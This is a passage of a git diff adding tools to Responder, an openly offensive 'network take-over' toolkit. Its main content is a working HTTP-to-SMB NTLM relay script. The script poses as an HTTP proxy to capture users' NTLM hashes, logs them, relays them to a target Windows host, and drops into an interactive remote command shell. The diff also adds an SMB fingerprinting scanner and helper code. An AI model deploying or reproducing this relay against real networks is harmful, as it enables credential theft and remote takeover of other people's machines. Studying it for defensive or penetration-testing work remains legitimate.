+       head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
+       t = OpenAndX(File="\\Windows\\Temp\\Results.txt", OpenFunc="\x01\x00")
+       t.calculate()
+       packet1 = str(head)+str(t)
+       buffer1 = longueur(packet1)+packet1  
+       s.send(buffer1)
+       data = s.recv(2048)
+       return data
+

tools/RelayHTTPSMB/HTTPToSMBRelay.py

@@ -0,0 +1,361 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sys, re, os, logging, warnings, thread, optparse, time
+from HTTPRelayPacket import *
+from Finger import RunFinger
+sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../../')))
+from socket import *
+
+__version__ = "0.2"
+
+def UserCallBack(op, value, dmy, parser):
+    args=[]
+    for arg in parser.rargs:
+        if arg[0] != "-":
+            args.append(arg)
+    if getattr(parser.values, op.dest):
+        args.extend(getattr(parser.values, op.dest))
+    setattr(parser.values, op.dest, args)
+
+parser = optparse.OptionParser(usage="python %prog -t10.20.30.40 -u Administrator lgandx admin", version=__version__, prog=sys.argv[0])
+parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
+
+parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay")
+
+options, args = parser.parse_args()
+
+if options.TARGET is None:
+    print "\n-t Mandatory option is missing, please provide a target.\n"
+    parser.print_help()
+    exit(-1)
+if options.UserToRelay is None:
+    print "\n-u Mandatory option is missing, please provide a username to relay.\n"
+    parser.print_help()
+    exit(-1)
+
+UserToRelay = options.UserToRelay
+Host = options.TARGET, 445
+Cmd = ""
+
+def ShowWelcome():
+    print '\n\033[1;34mResponder Proxy Auth to SMB NTLMv1/2 Relay 0.2\nSupporting NTLMv1 and NTLMv2.'
+    print 'Send bugs/hugs/comments to: laurent.gaffie@gmail.com'
+    print 'Usernames to relay (-u) are case sensitive.'
+    print 'To kill this script hit CRTL-C or <Enter>.\033[1;31m\n'
+    print 'Use this script in combination with Responder.py for best results.'
+    print 'Do not to use Responder.py with -P set. This tool does the same'
+    print 'than -P but with cross-protocol NTLM relay. Always target a box ' 
+    print 'joined to the target domain,not the PDC as SMB signing is enabled '
+    print 'by default. For optimal pwnage and stealthiness, launch Responder '
+    print 'with these 2 options only: -rv \033[0m'
+    print '\n\033[1;34mRelaying credentials only for these users:\033[32m'
+    print UserToRelay
+    print '\033[0m\n'
+
+ShowWelcome()
+Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../../"
+
+Logs = logging
+Logs.basicConfig(filemode="a",filename=Logs_Path+'logs/SMBRelay-Session.txt',level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
+
+try:
+    RunFinger(Host[0])
+except:
+    print "The host %s seems to be down or port 445 down."%(Host[0])
+    sys.exit(1)
+
+
+# Function used to write captured hashs to a file.
+def WriteData(outfile, data, user):
+	if not os.path.isfile(outfile):
+		with open(outfile,"w") as outf:
+			outf.write(data + '\n')
+		return
+	with open(outfile,"r") as filestr:
+		if re.search(user.encode('hex'), filestr.read().encode('hex')):
+			return False
+		elif re.search(re.escape("$"), user):
+			return False
+	with open(outfile,"a") as outf2:
+		outf2.write(data + '\n')
+
+#Function used to verify if a previous auth attempt was made.
+def ReadData(Outfile, Client, User, Domain, Target, cmd):
+    try:
+        with open(Logs_Path+"logs/"+Outfile,"r") as filestr:
+            Login = Client+":"+User+":"+Domain+":"+Target+":Logon Failure"
+            if re.search(Login.encode('hex'), filestr.read().encode('hex')):
+                print "[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User)
+                return True
+
+            else:
+                return False
+    except:
+        raise
+
+def ParseHTTPHash(data, key, client):
+	LMhashLen    = struct.unpack('<H',data[12:14])[0]
+	LMhashOffset = struct.unpack('<H',data[16:18])[0]
+	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+	
+	NthashLen    = struct.unpack('<H',data[20:22])[0]
+	NthashOffset = struct.unpack('<H',data[24:26])[0]
+	NTHash       = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+	
+	UserLen      = struct.unpack('<H',data[36:38])[0]
+	UserOffset   = struct.unpack('<H',data[40:42])[0]
+	User         = data[UserOffset:UserOffset+UserLen].replace('\x00','')
+
+	if NthashLen == 24:
+		HostNameLen     = struct.unpack('<H',data[46:48])[0]
+		HostNameOffset  = struct.unpack('<H',data[48:50])[0]
+		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
+		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, key.encode("hex"))
+		WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
+                print "[+] Received NTLMv1 hash from: %s"%(client)
+                if User in UserToRelay:
+                        print "[+] Username: %s is whitelisted, fowarding credentials."%(User)
+                        if ReadData("SMBRelay-Session.txt", client, User, HostName, Host[0], cmd=None):
+                           return None, None
+                        else:
+                	   return User, HostName
+                else:
+                        print "[+] Username: %s not in target list, dropping connection."%(User)
+                	return None, None
+
+	if NthashLen > 24:
+		NthashLen      = 64
+		DomainLen      = struct.unpack('<H',data[28:30])[0]
+		DomainOffset   = struct.unpack('<H',data[32:34])[0]
+		Domain         = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+		HostNameLen    = struct.unpack('<H',data[44:46])[0]
+		HostNameOffset = struct.unpack('<H',data[48:50])[0]
+		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
+		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, key.encode("hex"), NTHash[:32], NTHash[32:])
+		WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
+                print "[+] Received NTLMv2 hash from: %s"%(client)
+                if User in UserToRelay:
+                        print "[+] Username: %s is whitelisted, fowarding credentials."%(User)
+                        if ReadData("SMBRelay-Session.txt", client, User, Domain, Host[0], cmd=None):
+                           return None, None
+                        else:
+                	   return User, Domain
+                else:
+                        print "[+] Username: %s not in target list, dropping connection."%(User)
+                	return None, None
+
+def longueur(payload):
+	return struct.pack(">i", len(''.join(payload)))
+
+def ExtractChallenge(data):
+    SecBlobLen = struct.unpack("<h", data[43:45])[0]
+    if SecBlobLen < 255:
+       Challenge = data[102:110]
+    if SecBlobLen > 255:
+       Challenge = data[106:114]
+    print "[+] Setting up HTTP Proxy with SMB challenge:", Challenge.encode("hex")
+    return Challenge
+
+def ExtractRawNTLMPacket(data):
+    SecBlobLen = struct.unpack("<h", data[43:45])[0]
+    SSP = re.search("NTLMSSP", data[47:]).start()
+    RawNTLM = data[47+SSP:47+SecBlobLen]
+    return RawNTLM
+
+def GetSessionResponseFlags(data):
+    if data[41:43] == "\x01\x00":
+       print "[+] Server returned session positive, but as guest. Psexec should fail even if authentication was successful.."
+
+def get_command():
+    global Cmd
+    Cmd = ""
+    while len(Cmd) is 0:
+       Cmd = raw_input("C:\\Windows\\system32\\:#")
+
+def SMBKeepAlive(s, data, NextEcho = 20):
+    while True:
+        head = SMBHeader(cmd="\x2b",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+        t = SMBEcho()
+        packet1 = str(head)+str(t)
+        buffer1 = longueur(packet1)+packet1  
+        s.send(buffer1)
+        data = s.recv(2048)
+        time.sleep(NextEcho)
+
+def HTTPProxyRelay():
+    so = socket(AF_INET,SOCK_STREAM)
+    so.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1)
+    try:
+        so.bind(('0.0.0.0', 3128))
+        so.listen(10)
+        s = socket(AF_INET, SOCK_STREAM)
+        s.connect(Host)  
+        s.settimeout(30)
+    except:
+        "Cannot bind to port 3128, something else must be using it."
+        sys.exit(1)
+
+    try:
+        while True:
+            conn, addr = so.accept()
+            data = conn.recv(4096)
+            if not data: 
+               break
+            NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+	    Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
+	    if NTLM_Auth:
+	        Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
+		if Packet_NTLM == "\x01":
+                        ## SMB Block. Relay PROXY NTLM NEGO to target srv.
+                        h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x07\xc8")
+                        n = SMBNegoCairo(Data = SMBNegoCairoData())
+                        n.calculate()
+                        packet0 = str(h)+str(n)
+                        buffer0 = longueur(packet0)+packet0
+                        s.send(buffer0)
+                        smbdata = s.recv(2048)
+                        ##Session Setup AndX Request, NTLMSSP_NEGOTIATE
+                        if smbdata[8:10] == "\x72\x00":
+                           head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00")
+                           t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
+                           t.calculate() 
+                           packet1 = str(head)+str(t)
+                           buffer1 = longueur(packet1)+packet1  
+                           s.send(buffer1)
+                           smbdata = s.recv(2048)
+                        
+                        ## Send HTTP Proxy 
+			Buffer_Ans = WPAD_NTLM_Challenge_Ans()
+			Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
+                        key = ExtractChallenge(data)#Grab challenge key
+			conn.send(str(Buffer_Ans))
+                        data = conn.recv(8092)
+
+                        NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+                        Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
+
+		        if Packet_NTLM == "\x03":
+			   NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
+                           Username, Domain = ParseHTTPHash(NTLM_Auth, key, addr[0])
+
+                           if Username is not None:
+                              ##Got the ntlm message 3, send it over to SMB.
+                              head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",uid=smbdata[32:34],mid="\x03\x00")
+                              t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
+                              t.calculate()
+                              packet1 = str(head)+str(t)
+                              buffer1 = longueur(packet1)+packet1  
+                              print "[+] SMB Session Auth sent."
+                              s.send(buffer1)
+                              smbdata = s.recv(2048)
+   	                      return smbdata, s, addr[0], Username, Domain
+                           else:
+                              return None, None, None, None, None
+	    else:
+                Response = WPAD_Auth_407_Ans()
+	        conn.send(str(Response))
+                data = conn.recv(4096)
+
+    except:
+        return None, None, None, None, None
+ 
+
+def RunPsExec(Host):
+
+    data, s, clientIP, Username, Domain = HTTPProxyRelay()
+    if data == None:
+        return False
+
+    if data[8:10] == "\x73\x6d":
+        print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target.\n[+] Hashes were saved anyways in Responder/logs/ folder."
+        Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
+
+    if data[8:10] == "\x73\x8d":
+        print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n"
+        Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
+
+    ## Tree Connect
+    if data[8:10] == "\x73\x00":
+        GetSessionResponseFlags(data)#Verify if the target returned a guest session.
+        head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+        t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$")
+        t.calculate() 
+        packet1 = str(head)+str(t)
+        buffer1 = longueur(packet1)+packet1  
+        s.send(buffer1)
+        data = s.recv(2048)
+
+    ## Fail Handling.
+    if data[8:10] == "\x75\x22":
+        print "[+] Tree Connect AndX denied. SMB Signing is likely mandatory on the target, or low privilege user.\n[+] Hashes were saved anyways in Responder/logs/ folder."
+        return False
+
+    ## NtCreateAndx
+    if data[8:10] == "\x75\x00":
+        print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n"
+
+    while True:
+        if data[8:10] == "\x75\x00":
+            thread.start_new_thread(SMBKeepAlive, (s,data, 15)) #keep it alive every 15 secs.
+            thread.start_new_thread(get_command, ())
+            while Cmd == "":
+                pass
+
+            if Cmd == "exit":
+               sys.exit(1)
+
+            data = RunCmd(data, s, clientIP, Username, Domain, Cmd, Logs, Host)
+
+        if data is None:
+           print "\033[1;31m\nSomething went wrong, the server dropped the connection. Make sure to clean the server (\\Windows\\Temp\\)\033[0m\n"
+
+        if data[8:10] == "\x2d\x34":#Confirmed with OpenAndX that no file remains.
+            head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+            t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$")
+            t.calculate() 
+            packet1 = str(head)+str(t)
+            buffer1 = longueur(packet1)+packet1  
+            s.send(buffer1)
+            data = s.recv(2048)
+            Cmd2 = raw_input("C:\\Windows\\system32\\:#")
+
+            while len(Cmd2) is 0:
+                Cmd2 = raw_input("C:\\Windows\\system32\\:#")
+
+            if Cmd2 == "exit":
+               sys.exit(1)
+
+            data = RunCmd(data, s, clientIP, Username, Domain, Cmd2, Logs, Host)
+
+    if data[8:10] == "\x2d\x00":
+       print "[*] File still exist (Windows\\Temp\\Results.txt), server's not playing nicely."
+
+
+def main():
+    try:
+        num_thrd = 1
+        while num_thrd > 0:
+            RunPsExec(Host)
+            time.sleep(1)
+    except KeyboardInterrupt:
+        exit()
+
+if __name__ == '__main__':
+    try:
+        main()
+    except:
+        raise

tools/RelayHTTPSMB/odict.py

@@ -0,0 +1,117 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+from UserDict import DictMixin
+
+class OrderedDict(dict, DictMixin):
+
+    def __init__(self, *args, **kwds):
+        if len(args) > 1:
+            raise TypeError('expected at most 1 arguments, got %d' % len(args))
+        try:
+            self.__end
+        except AttributeError:
+            self.clear()
+        self.update(*args, **kwds)
+
+    def clear(self):
+        self.__end = end = []
+        end += [None, end, end]
+        self.__map = {}
+        dict.clear(self)
+
+    def __setitem__(self, key, value):
+        if key not in self:
+            end = self.__end
+            curr = end[1]
+            curr[2] = end[1] = self.__map[key] = [key, curr, end]
+        dict.__setitem__(self, key, value)
+
+    def __delitem__(self, key):
+        dict.__delitem__(self, key)
+        key, prev, next = self.__map.pop(key)
+        prev[2] = next
+        next[1] = prev
+
+    def __iter__(self):
+        end = self.__end
+        curr = end[2]
+        while curr is not end:
+            yield curr[0]
+            curr = curr[2]
+
+    def __reversed__(self):
+        end = self.__end
+        curr = end[1]
+        while curr is not end:
+            yield curr[0]
+            curr = curr[1]
+
+    def popitem(self, last=True):
+        if not self:
+            raise KeyError('dictionary is empty')
+        if last:
+            key = reversed(self).next()
+        else:
+            key = iter(self).next()
+        value = self.pop(key)
+        return key, value
+
+    def __reduce__(self):
+        items = [[k, self[k]] for k in self]
+        tmp = self.__map, self.__end
+        del self.__map, self.__end
+        inst_dict = vars(self).copy()
+        self.__map, self.__end = tmp
+        if inst_dict:
+            return self.__class__, (items,), inst_dict
+        return self.__class__, (items,)
+
+    def keys(self):
+        return list(self)
+
+    setdefault = DictMixin.setdefault
+    update = DictMixin.update
+    pop = DictMixin.pop
+    values = DictMixin.values
+    items = DictMixin.items
+    iterkeys = DictMixin.iterkeys
+    itervalues = DictMixin.itervalues
+    iteritems = DictMixin.iteritems
+
+    def __repr__(self):
+        if not self:
+            return '%s()' % (self.__class__.__name__,)
+        return '%s(%r)' % (self.__class__.__name__, self.items())
+
+    def copy(self):
+        return self.__class__(self)
+
+    @classmethod
+    def fromkeys(cls, iterable, value=None):
+        d = cls()
+        for key in iterable:
+            d[key] = value
+        return d
+
+    def __eq__(self, other):
+        if isinstance(other, OrderedDict):
+            return len(self)==len(other) and \
+                   min(p==q for p, q in  zip(self.items(), other.items()))
+        return dict.__eq__(self, other)
+
+    def __ne__(self, other):
+        return not self == other

tools/SMBFinger/Finger.py

@@ -0,0 +1,234 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import re,sys,socket,struct
+from socket import *
+from odict import OrderedDict
+import optparse
+
+__version__ = "0.3"
+
+parser = optparse.OptionParser(usage='python %prog -i 10.10.10.224\nor:\npython %prog -i 10.10.10.0/24', version=__version__, prog=sys.argv[0])
+
+parser.add_option('-i','--ip',             action="store",      help="Target IP address or class C", dest="TARGET", metavar="10.10.10.224", default=None)
+options, args = parser.parse_args()
+
+Timeout = 0.3
+Host = options.TARGET
+
+class Packet():
+    fields = OrderedDict([
+    ])
+    def __init__(self, **kw):
+        self.fields = OrderedDict(self.__class__.fields)
+        for k,v in kw.items():
+            if callable(v):
+                self.fields[k] = v(self.fields[k])
+            else:
+                self.fields[k] = v
+    def __str__(self):
+        return "".join(map(str, self.fields.values()))
+
+def longueur(payload):
+    length = struct.pack(">i", len(''.join(payload)))
+    return length
+
+class SMBHeader(Packet):
+    fields = OrderedDict([
+        ("proto",      "\xff\x53\x4d\x42"),
+        ("cmd",        "\x72"),
+        ("error-code", "\x00\x00\x00\x00" ),
+        ("flag1",      "\x00"),
+        ("flag2",      "\x00\x00"),
+        ("pidhigh",    "\x00\x00"),
+        ("signature",  "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("reserved",   "\x00\x00"),
+        ("tid",        "\x00\x00"),
+        ("pid",        "\x00\x00"),
+        ("uid",        "\x00\x00"),
+        ("mid",        "\x00\x00"),
+    ])
+
+class SMBNego(Packet):
+    fields = OrderedDict([
+        ("Wordcount", "\x00"),
+        ("Bcc", "\x62\x00"),
+        ("Data", "")
+    ])
+    
+    def calculate(self):
+        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
+
+class SMBNegoData(Packet):
+    fields = OrderedDict([
+        ("BuffType","\x02"),
+        ("Dialect", "NT LM 0.12\x00"),
+    ])
+
+
+class SMBSessionFingerData(Packet):
+    fields = OrderedDict([
+        ("wordcount", "\x0c"),
+        ("AndXCommand", "\xff"),
+        ("reserved","\x00" ),
+        ("andxoffset", "\x00\x00"),
+        ("maxbuff","\x04\x11"),
+        ("maxmpx", "\x32\x00"),
+        ("vcnum","\x00\x00"),
+        ("sessionkey", "\x00\x00\x00\x00"),
+        ("securitybloblength","\x4a\x00"),
+        ("reserved2","\x00\x00\x00\x00"),
+        ("capabilities", "\xd4\x00\x00\xa0"),
+        ("bcc1",""),
+        ("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
+
+    ])
+    def calculate(self):
+        self.fields["bcc1"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
+
+##Now Lanman
+class SMBHeaderLanMan(Packet):
+    fields = OrderedDict([
+        ("proto", "\xff\x53\x4d\x42"),
+        ("cmd", "\x72"),
+        ("error-code", "\x00\x00\x00\x00" ),
+        ("flag1", "\x08"),
+        ("flag2", "\x01\xc8"),
+        ("pidhigh", "\x00\x00"),
+        ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("reserved", "\x00\x00"),
+        ("tid", "\x00\x00"),
+        ("pid", "\x3c\x1b"),
+        ("uid", "\x00\x00"),
+        ("mid", "\x00\x00"),
+    ])
+
+class SMBNegoDataLanMan(Packet):
+    fields = OrderedDict([
+        ("Wordcount", "\x00"),
+        ("Bcc", "\x54\x00"),
+        ("BuffType","\x02"),
+        ("Dialect", "NT LM 0.12\x00"),
+
+    ])
+    def calculate(self):
+        CalculateBCC = str(self.fields["BuffType"])+str(self.fields["Dialect"])
+        self.fields["Bcc"] = struct.pack("<h",len(CalculateBCC))
+
+#####################
+
+def atod(a): 
+    return struct.unpack("!L",inet_aton(a))[0]
+
+def dtoa(d): 
+    return inet_ntoa(struct.pack("!L", d))
+
+def OsNameClientVersion(data):
+	try:
+		length = struct.unpack('<H',data[43:45])[0]
+		OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
+		return OsVersion, ClientVersion
+
+	except:
+	 	return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
+
+def GetHostnameAndDomainName(data):
+	try:
+		DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])
+		return Hostname, DomainJoined
+	except:
+	 	return "Could not get Hostname.", "Could not get Domain joined"
+
+def DomainGrab(Host):
+    s = socket(AF_INET, SOCK_STREAM)
+    try:
+       s.settimeout(Timeout)
+       s.connect(Host)
+    except:
+       print "Host down or port close, skipping"
+       pass
+    try:
+       h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00")
+       n = SMBNegoDataLanMan()
+       n.calculate()
+       packet0 = str(h)+str(n)
+       buffer0 = longueur(packet0)+packet0
+       s.send(buffer0)
+       data = s.recv(2048)
+       if data[8:10] == "\x72\x00":
+          return GetHostnameAndDomainName(data)
+    except:
+       pass 
+
+def SmbFinger(Host):
+    s = socket(AF_INET, SOCK_STREAM)
+    try:
+       s.settimeout(Timeout)
+       s.connect(Host)
+    except:
+       print "Host down or port close, skipping"
+       pass
+    try:     
+       h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
+       n = SMBNego(Data = SMBNegoData())
+       n.calculate()
+       packet0 = str(h)+str(n)
+       buffer0 = longueur(packet0)+packet0
+       s.send(buffer0)
+       data = s.recv(2048)
+       if data[8:10] == "\x72\x00":
+          head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
+          t = SMBSessionFingerData()
+          t.calculate() 
+          packet0 = str(head)+str(t)
+          buffer1 = longueur(packet0)+packet0  
+          s.send(buffer1) 
+          data = s.recv(2048)
+       if data[8:10] == "\x73\x16":
+          return OsNameClientVersion(data)
+    except:
+       pass
+##################
+#run it
+def ShowResults(Host):
+    s = socket(AF_INET, SOCK_STREAM)
+    try:
+       s.settimeout(Timeout)
+       s.connect(Host)
+    except:
+       return False
+
+    try:
+       print "Retrieving information for %s..."%Host[0]
+       OsVer, LanManClient = SmbFinger(Host)
+       print "Os version: '%s'\nLanman Client: '%s'"%(OsVer, LanManClient)
+       Hostname, DomainJoined = DomainGrab(Host)
+       print "Machine Hostname: '%s'\nThis machine is part of the '%s' domain\n"%(Hostname, DomainJoined)
+    except:
+       pass
+
+def RunFinger(Host):
+    m = re.search("/", str(Host))
+    if m :
+       net,_,mask = Host.partition('/')
+       mask = int(mask)
+       net = atod(net)
+       for host in (dtoa(net+n) for n in range(0, 1<<32-mask)):
+           ShowResults((host,445))
+    else:
+       ShowResults((Host,445))   
+
+RunFinger(Host)

tools/SMBFinger/odict.py

@@ -0,0 +1,106 @@
+from UserDict import DictMixin
+
+class OrderedDict(dict, DictMixin):
+
+    def __init__(self, *args, **kwds):
+        if len(args) > 1:
+            raise TypeError('expected at most 1 arguments, got %d' % len(args))
+        try:
+            self.__end
+        except AttributeError:
+            self.clear()
+        self.update(*args, **kwds)
+
+    def clear(self):
+        self.__end = end = []
+        end += [None, end, end]
+        self.__map = {} 
+        dict.clear(self)
+
+    def __setitem__(self, key, value):
+        if key not in self:
+            end = self.__end
+            curr = end[1]
+            curr[2] = end[1] = self.__map[key] = [key, curr, end]
+        dict.__setitem__(self, key, value)
+
+    def __delitem__(self, key):
+        dict.__delitem__(self, key)
+        key, prev, next = self.__map.pop(key)
+        prev[2] = next
+        next[1] = prev
+
+    def __iter__(self):
+        end = self.__end
+        curr = end[2]
+        while curr is not end:
+            yield curr[0]
+            curr = curr[2]
+
+    def __reversed__(self):
+        end = self.__end
+        curr = end[1]
+        while curr is not end:
+            yield curr[0]
+            curr = curr[1]
+
+    def popitem(self, last=True):
+        if not self:
+            raise KeyError('dictionary is empty')
+        if last:
+            key = reversed(self).next()
+        else:
+            key = iter(self).next()
+        value = self.pop(key)
+        return key, value
+
+    def __reduce__(self):
+        items = [[k, self[k]] for k in self]
+        tmp = self.__map, self.__end
+        del self.__map, self.__end
+        inst_dict = vars(self).copy()
+        self.__map, self.__end = tmp
+        if inst_dict:
+            return (self.__class__, (items,), inst_dict)
+        return self.__class__, (items,)
+
+    def keys(self):
+        return list(self)
+
+    setdefault = DictMixin.setdefault
+    update = DictMixin.update
+    pop = DictMixin.pop
+    values = DictMixin.values
+    items = DictMixin.items
+    iterkeys = DictMixin.iterkeys
+    itervalues = DictMixin.itervalues
+    iteritems = DictMixin.iteritems
+
+    def __repr__(self):
+        if not self:
+            return '%s()' % (self.__class__.__name__,)
+        return '%s(%r)' % (self.__class__.__name__, self.items())
+
+    def copy(self):
+        return self.__class__(self)
+
+    @classmethod
+    def fromkeys(cls, iterable, value=None):
+        d = cls()
+        for key in iterable:
+            d[key] = value
+        return d
+
+    def __eq__(self, other):
+        if isinstance(other, OrderedDict):
+            return len(self)==len(other) and \
+                   min(p==q for p, q in  zip(self.items(), other.items()))
+        return dict.__eq__(self, other)
+
+    def __ne__(self, other):
+        return not self == other
+
+
+if __name__ == '__main__':
+    d = OrderedDict([('foo',2),('bar',3),('baz',4),('zot',5),('arrgh',6)])
+    assert [x for x in d] == ['foo', 'bar', 'baz', 'zot', 'arrgh']

utils.py

@@ -21,7 +21,11 @@ import logging
 import socket
 import time
 import settings
+import datetime
 
+def HTTPCurrentDate():
+    Date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
+    return Date
 try:
 	import sqlite3
 except:
@@ -39,13 +43,12 @@ def color(txt, code = 1, modifier = 0):
 	return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
 
 def text(txt):
+        stripcolors = re.sub(r'\x1b\[([0-9,A-Z]{1,2}(;[0-9]{1,2})?(;[0-9]{3})?)?[m|K]?', '', txt)
+        logging.info(stripcolors)
 	if os.name == 'nt':
 		return txt
 	return '\r' + re.sub(r'\[([^]]*)\]', "\033[1;34m[\\1]\033[0m", txt)
 
-def textlogging(txt):
-	logging.info(txt)
-
 def IsOnTheSameSubnet(ip, net):
 	net += '/24'
 	ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
@@ -54,7 +57,6 @@ def IsOnTheSameSubnet(ip, net):
 	mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
 	return (ipaddr & mask) == (netaddr & mask)
 
-
 def RespondToThisIP(ClientIp):
 
 	if ClientIp.startswith('127.0.0.'):
@@ -80,6 +82,12 @@ def RespondToThisName(Name):
 def RespondToThisHost(ClientIp, Name):
 	return RespondToThisIP(ClientIp) and RespondToThisName(Name)
 
+def RespondWithIPAton():
+       if settings.Config.ExternalIP:
+               return settings.Config.ExternalIPAton
+       else:
+               return settings.Config.IP_aton
+
 def OsInterfaceIsSupported():
 	if settings.Config.Interface != "Not set":
 		return not IsOsX()
@@ -122,6 +130,10 @@ def WriteData(outfile, data, user):
 	with open(outfile,"a") as outf2:
 		outf2.write(data + '\n')
 
+# Function used to write debug config and network info.
+def DumpConfig(outfile, data):
+	with open(outfile,"a") as dump:
